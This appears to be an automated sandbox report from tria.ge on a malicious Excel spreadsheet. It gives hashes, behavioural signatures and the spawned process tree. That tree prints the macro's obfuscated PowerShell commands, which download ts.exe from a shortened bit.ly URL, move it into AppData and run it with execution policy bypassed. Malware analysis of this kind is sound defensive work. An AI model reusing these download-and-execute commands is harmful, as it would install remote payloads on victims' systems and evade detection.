Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
28/06/2024, 09:57
Behavioral task
behavioral1
Sample
19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls
Resource
win10v2004-20240611-en
General
-
Target
19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls
-
Size
116KB
-
MD5
19b5bbd4478a50df5b886c7c9168ec59
-
SHA1
9c84634a5685ebe2f75b2b3eecffc7c2748bd621
-
SHA256
7a89a04ff27d6fe5e0d9249feee09c24989b074aa75e5563f755a7a279c62e5e
-
SHA512
637d9a59ef4ce4145ac1ebc6c5bcfcf202b8c20d9a55c90ea4add7cd9f57832f9859201b1d1716138877c2e42d00b5c1413212cc0ac61c92273c036325e18539
-
SSDEEP
3072:ZTk3hbdlylKsgqopeJBWhZFGkE+cL2NdAoioo1gaSNAPZlsWFPO7YiR6PJEcjjas:Fk3hbdlylKsgqopeJBWhZFVE+W2NdAos
Malware Config
Extracted
https://bit.ly/3djeHvo
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5092 5084 powershell.exe 81 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4036 5084 powershell.exe 81 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1484 5084 powershell.exe 81 -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 1484 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5084 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1484 powershell.exe 5092 powershell.exe 4036 powershell.exe 5092 powershell.exe 1484 powershell.exe 4036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE 5084 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5084 wrote to memory of 1484 5084 EXCEL.EXE 86 PID 5084 wrote to memory of 1484 5084 EXCEL.EXE 86 PID 5084 wrote to memory of 4036 5084 EXCEL.EXE 87 PID 5084 wrote to memory of 4036 5084 EXCEL.EXE 87 PID 5084 wrote to memory of 5092 5084 EXCEL.EXE 88 PID 5084 wrote to memory of 5092 5084 EXCEL.EXE 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\19b5bbd4478a50df5b886c7c9168ec59_JaffaCakes118.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('https://bit.ly/3djeHvo','ts.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 Start-Sleep 20; Move-Item "ts.exe" -Destination "${enV`:appdata}"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/ts.exe')2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5ac3bf9756600f6c31a15240716e6e7c6
SHA1521aa76b55f74cafd1b579933dc0fae439acb0f5
SHA256f7bc65b2962543bb5165f2b1bb6b3390ed3b55801475b2fd7701129cc8a081fd
SHA51296ae0dddaeadae05fed313707076af5d443d328d2ea8524aa283812591b615b596a0aab1d2918471aba59f5546cebca7521bd2003db63a24f548899bee5fa67a
-
Filesize
1KB
MD5331841fe482ffe8b1cc1509733d8ca67
SHA11e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
SHA25614112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
SHA512039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD577412068570786b3b167565843ed51c0
SHA13e77dd5a999218ca8f2914db57cea703fb05af4d
SHA2560da0068fe5822318612bd28633616e373c92a5526dc19871c95c6e6d2706b52d
SHA5128cf1e6b9513186a5be1064d965d18506994b22384214c9c87ccd6a519114a3ba5d2a24e107b77de1b5f07bfdc2687b08c02606389bba93bbd6371283bd525b0c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD53b9928fb5fb899c857490a8caa4df4d5
SHA13e7daf3c50263a4bea1616010d52dcc2d6ebf0d2
SHA256cf8f4b7c0d3f43264f8688a0082fec6abc22b8f1f5eb4f2626481c01c8793dfe
SHA512ad094cb1ed8e66a95a02d4949fbfd8640698181b18baf943ce5969b6c8b9ca1dcaf6bb06fe94b3dd5e49f60799d3a0fbaac230d90eb00cbe36aa069783752421
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize6KB
MD54d98da30393795581760a0736d3158ab
SHA179ab0bec6140a3dd05819cffd61c4d6fef6f77e7
SHA2566e67ab3fedd56536bbdb97093de5ddbbeac5265661c516359415c29338c3823f
SHA512474a6ab3d264e763a5ad90ef3ed0065d4d04e6e5b8ffbe4c3d84dcc1dda27f692e1dc5962e8c245ef76e42f4f71626f11b865cfcafce70e5a4314a1ddd41e1b1